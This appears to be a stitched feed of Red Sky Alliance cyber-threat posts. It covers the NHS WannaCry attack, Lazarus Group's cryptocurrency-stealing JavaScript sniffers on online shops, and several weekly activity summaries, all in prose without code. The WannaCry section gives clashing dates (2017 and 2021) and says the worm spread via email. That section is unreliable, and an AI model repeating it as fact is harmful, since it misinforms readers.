<p>More than a third of UK hospital trusts had their systems crippled in the WannaCry ransomware attack in May 2017. Nearly 20,000 hospital appointments were cancelled because the NHS failed to provide basic security against cyber attackers. NHS officials claimed 47 trusts were affected – but the National Audit Office (NAO) found the impact was far greater, and in fact 81 were hit by the attack. When the attack started on 12 May, it tore through the out-of-date defenses used by the NHS. More than a third of hospital trusts had their systems crippled in the WannaCry ransomware attack last May (2021). The virus, which spread via email, locked staff out of their computers and demanded £230 to release the files on each employee account. Hospital staff reported seeing computers go down 'one by one' as the attack took hold. Locked-out medics had to rely on pen and paper, while crucial equipment such as MRI machines was also disabled by the attack. The report reveals nearly 19,500 medical appointments were cancelled, including 139 potential cancer referrals. Five hospitals even had to divert ambulances away at the peak of the crisis. Hospitals were found to have been running out-of-date computer systems, such as Windows XP and Windows 7, that had not been updated to secure them against such attacks. Computers at almost 600 GP surgeries were also victims. Cyber experts said the cyber-attack could have easily been prevented. Officials were warned repeatedly about the WannaCry virus beforehand.</p>
<p>The Department of Health said that from January 2018 hospitals will be subject to unannounced inspections of IT security. I guess it was not enough to prevent this current attack.</p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a></p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></li>
<li>Website: <a href="https://www.wapacklabs.com/">https://www.wapacklabs.com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://news.sky.com/story/ministers-coordinating-resilience-response-after-major-cyber-attack-hits-nhs-systems-across-uk-12666611">https://news.sky.com/story/ministers-coordinating-resilience-response-after-major-cyber-attack-hits-nhs-systems-across-uk-12666611</a></p>
<p><a href="#_ftnref2">[2]</a> <a href="https://www.dailymail.co.uk/health/article-11102003/NHS-cyber-attack-Hackers-issue-demands-supplier.html">https://www.dailymail.co.uk/health/article-11102003/NHS-cyber-attack-Hackers-issue-demands-supplier.html</a></p></div>Weekly Report - All Sector 11 19 2021https://redskyalliance.org/xindustry/weekly-report-all-sector-11-19-20212021-11-19T13:55:16.000Z2021-11-19T13:55:16.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><h2><a href="{{#staticFileLink}}9824409479,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}9824409479,RESIZE_400x{{/staticFileLink}}" width="250" alt="9824409479?profile=RESIZE_400x" /></a>Activity Summary - Week Ending on 19 November 2021:</h2>
<ul>
<li>Red Sky Alliance identified 22,393 connections from new IPs checking in with our Sinkholes</li>
<li>Analysts identified 5,918 new IP addresses participating in various Botnets</li>
<li>Firsttheberg.net in France has a Compromised IP</li>
<li>MBR Attacks</li>
<li>Abcbot Linux Malware</li>
<li>FatPipe</li>
<li>Not Just the CISOs Problem</li>
<li>Swedish Spoof</li>
<li>The FBI is Cold?</li>
<li>Lazarus Still Around</li>
<li>UK Gamers</li>
</ul>
<p>Link to full report: <a href="{{#staticFileLink}}9824409456,original{{/staticFileLink}}">IR-21-323-001_weekly323.pdf</a></p></div>Lazarus Attackers are Targeting Cryptocurrency Toohttps://redskyalliance.org/xindustry/lazarus-targeting-cryptocurrency2021-04-29T20:22:48.000Z2021-04-29T20:22:48.000ZJim McKeehttps://redskyalliance.org/members/JimMcKee<div><p><a href="{{#staticFileLink}}8872398281,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}8872398281,RESIZE_400x{{/staticFileLink}}" alt="8872398281?profile=RESIZE_400x" width="250" /></a>As more web merchants accept cryptocurrencies, the possibilities for theft and fraud will increase. Consumers and businesses will not have the protections they have come to expect as standard for purchases made by credit card. Hackers with apparent ties to North Korea that hit e-commerce shops in 2019 and 2020 to steal payment card data also tested functionality for stealing cryptocurrency, according to the cybersecurity firm Group-IB. Group-IB's new report builds on findings published in July 2020 by the Dutch security firm Sansec, which reported that malicious infrastructure, and in many cases also malware, was being used for Magecart-style attack campaigns that had previously been attributed to the Lazarus Group.</p>
<p>During 2020, cyber threat investigators uncovered a global phishing campaign by Lazarus, and their newest data shows this activity continuing well into 2021. Their recent research showed how hackers phished for cryptocurrency via fake LinkedIn job alerts. Hackers targeted crypto talents by mimicking legitimate blockchain job listings. People received messages via LinkedIn with a file that contained malicious code. The purpose of the malware was to fetch credentials that would allow hackers to log in to certain systems and steal the cryptocurrency.</p>
<p>Lazarus, aka Hidden Cobra, Dark Seoul, Guardians of Peace, APT38, Bluenoroff, and a host of other names refers to a group of hackers with apparent ties to the Pyongyang-based government officially known as the Democratic People's Republic of Korea, led by Kim Jong-Un.</p>
<p>See: <a href="https://redskyalliance.org/xindustry/lazarus-group-is-back-with-more-malware">https://redskyalliance.org/xindustry/lazarus-group-is-back-with-more-malware</a></p>
<p>Magecart-style attacks refer to criminals stealing payment card data using so-called digital card skimming or scraping tools, aka JavaScript sniffers that they inject into victim organizations' e-commerce sites. Victims of such attacks have included British Airways, jewelry and accessories retailer Claire's, and Ticketmaster UK, among thousands of others.</p>
<p>Sansec is one of the firms that scan the web for signs of Magecart attacks. During 2020, it noted that while early Magecart attacks were largely the province of Russian and Indonesian gangs, the cash-strapped government of North Korea appeared to have joined the fray, bringing a greater degree of sophistication, no doubt in pursuit of large sums.</p>
<p>Group-IB noted that after reviewing the attack campaign discovered by Sansec, it also found signs suggesting that the attackers had been experimenting not just with stealing payment card data but also with stealing cryptocurrency. It reports finding the same infrastructure in use, together with a modified version of the same JavaScript sniffer (aka JS-sniffer) that Sansec described in its report. Group-IB has dubbed the cryptocurrency-targeting campaign Lazarus BTC Changer. "Combined with the gang's track record of going after crypto, the campaign makes it possible to attribute the attacks to Lazarus with a high level of confidence," says Victor Okorokov, lead threat intelligence analyst at Group-IB, in the research report.</p>
<p>But the cryptocurrency-targeting campaign only appeared to hit a few targets. "While analyzing Lazarus BTC Changer, we identified three compromised websites, two of which were listed in Sansec's article as victims," which are Realchems and Wongs Jewellers, he says. "In the case of Wongs Jewellers, we identified a sample of Lazarus BTC Changer on its website, but we did not find any evidence that the shop accepts cryptocurrency, so the attackers probably added Lazarus BTC Changer to the website by mistake," he says. "The third victim is an Italian luxury clothes shop, but malicious code was removed from the website" before researchers could analyze it.</p>
<p>The attackers appear to have stolen relatively little cryptocurrency from the sites' customers: only $9,000 worth of ethereum and $8,400 worth of bitcoin, according to investigators.</p>
<p>Group-IB says those stolen funds appeared to have been routed to bitcoin cryptocurrency wallets allegedly owned by CoinPayments.net, "a payment gateway that allows users to conduct transactions involving bitcoin, ethereum, litecoin, and other cryptocurrencies." Lazarus may have used the site to launder the stolen funds by moving them to other cryptocurrency exchanges or wallets.</p>
<p>The cybersecurity firm notes that CoinPayment's "know your customer" policy could help identify the individuals who initiated the transactions. The service's user agreement stipulates that individuals attest that they are not operating in or on behalf of anyone in a prohibited jurisdiction, which includes North Korea.</p>
<p>A spokesman for CoinPayments tells Information Security Media Group: "I'm not sure if there are any tied wallets or not, but we would not be able to comment about any user's personal information outside of legal channels due to privacy laws."</p>
<p>Given the scale of this cryptocurrency-targeting operation, Group-IB says what it discovered appears to have been a small-scale test run, adding that the Lazarus Group often runs smaller trials before launching larger campaigns.</p>
<p>"The amount of money stolen was relatively small due to the fact that the Lazarus BTC Changer campaign only targeted three small e-commerce stores that remained infected for a limited period of time, less than three months," Okorokov reported. "The campaign, however, marks the first time that Lazarus used malicious JS-sniffers to steal cryptocurrency. It’s definitely something that deserves attention as the technique has all the potential to grow in scale and sophistication, given the gang’s continued hunt for cryptocurrency."</p>
<p>When attackers target payment cards, they can often monetize the effort by selling the stolen card data on cybercrime forums and markets. Why would hackers bother to target the small number of sites that accept cryptocurrency, or individuals willing to pay using virtual currencies?</p>
<p>"Cryptocurrency payments are not as widespread as traditional credit cards in the e-commerce industry. Nonetheless, many big websites do accept cryptocurrency and such attacks can grow in scale, and other gangs can adopt Lazarus’ new technique," Okorokov says. In addition, he says, if an attacker gains control over an e-commerce website's payment portal, it could easily add the ability to pay via cryptocurrency, with the caveat that it would immediately flow into an attacker-controlled wallet. "Adversaries can attack users of the targeted company to steal cryptocurrency directly from them and not from the company by creating fake payment forms or replacing payment details" to route payments to their own wallets, Okorokov said.</p>
<p>Another likely target would be cybercrime marketplaces and forums (many of which are now hosted on the darknet, or dark web, meaning they can only be reached using the anonymizing Tor browser) that often only facilitate payments between buyers and sellers using bitcoin or monero.</p>
<p>"Users of illicit underground marketplaces seem to be likely targets, where cryptocurrency is the only currency," Okorokov says. "However, the attacks on users of legitimate cryptocurrency exchanges are also possible."</p>
<p>Red Sky Alliance has been analyzing and documenting these types of cyber threats for 9 years and maintains a resource library of malware and cyber actor reports available at <a href="https://redskyalliance.org">https://redskyalliance.org</a> at no charge. Many past tactics are often dusted off and reused in current malicious campaigns. Red Sky Alliance can provide actionable cyber intelligence and weekly blacklists to help protect your network. </p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments, or assistance, please contact the lab directly at 1-844-492-7225, or feedback@wapacklabs.com</p>
<p><strong>Weekly Cyber Intelligence Briefings</strong>:</p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></li>
<li>Website: <a href="https://www.wapacklabs.com/">https://www.wapacklabs.com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></li>
</ul>
<p><strong>Weekly Cyber Intelligence Briefings</strong>:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/3702558539639477516">https://attendee.gotowebinar.com/register/3702558539639477516</a></p></div>INTELLIGENCE REPORT: STATE LEVEL HACKERShttps://redskyalliance.org/xindustry/intelligence-report-state-level-hackers2021-04-16T16:54:30.000Z2021-04-16T16:54:30.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><h2><a href="{{#staticFileLink}}8801927301,RESIZE_710x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}8801927301,RESIZE_400x{{/staticFileLink}}" width="250" alt="8801927301?profile=RESIZE_400x" /></a>Activity Summary - Week Ending 16 April 2021:</h2>
<ul>
<li>Red Sky Alliance observed 58 new unique email accounts compromised with Keyloggers</li>
<li>Analysts identified 30,373 connections from new unique IP addresses</li>
<li>3,512 new IP addresses participating in various Botnets were Observed</li>
<li>Security Researcher under Attack</li>
<li>CISA’s New Tool – Aviary</li>
<li>FormBook Malware</li>
<li>State Sponsored APT</li>
<li>Lazarus and Vyvera</li>
<li>TiT-for-TaT is Never Good</li>
<li>Myanmar and Taiwan Protests</li>
</ul>
<p>Link to full report: <a href="{{#staticFileLink}}8801919698,original{{/staticFileLink}}">IR-21-106-001_weekly_106.pdf</a></p>
</div>TACTICAL CYBER REPORT: COMMUNICATIONS SECTORhttps://redskyalliance.org/xindustry/tactical-cyber-report-communications-sector2020-11-25T22:07:29.000Z2020-11-25T22:07:29.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><h2><a href="{{#staticFileLink}}8215461282,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}8215461282,RESIZE_400x{{/staticFileLink}}" alt="8215461282?profile=RESIZE_400x" width="250" /></a>Activity Summary - Week Ending 25 November 2020:</h2>
<ul>
<li>Red Sky Alliance observed 106 unique email accounts compromised with Keyloggers</li>
<li>Analysts identified 45,355 connections from new unique IP addresses</li>
<li>Lir Ukraine Llc Compromised C2</li>
<li>Hezbollah Threat Actors remain as the Top Hacking Group</li>
<li>Lazarus is Targeting the Supply Chain</li>
<li>Muhstik Botnet targeting Oracle</li>
<li>Boom!Mobile – Still not Happy</li>
<li>Everyone hang in there, add Oil</li>
<li>To our US Friends – Happy Thanksgiving</li>
</ul>
<p>Link to full report: <a href="{{#staticFileLink}}8217992663,original{{/staticFileLink}}">IR-20-330-001-Tactical Cyber Brief330.pdf</a></p></div>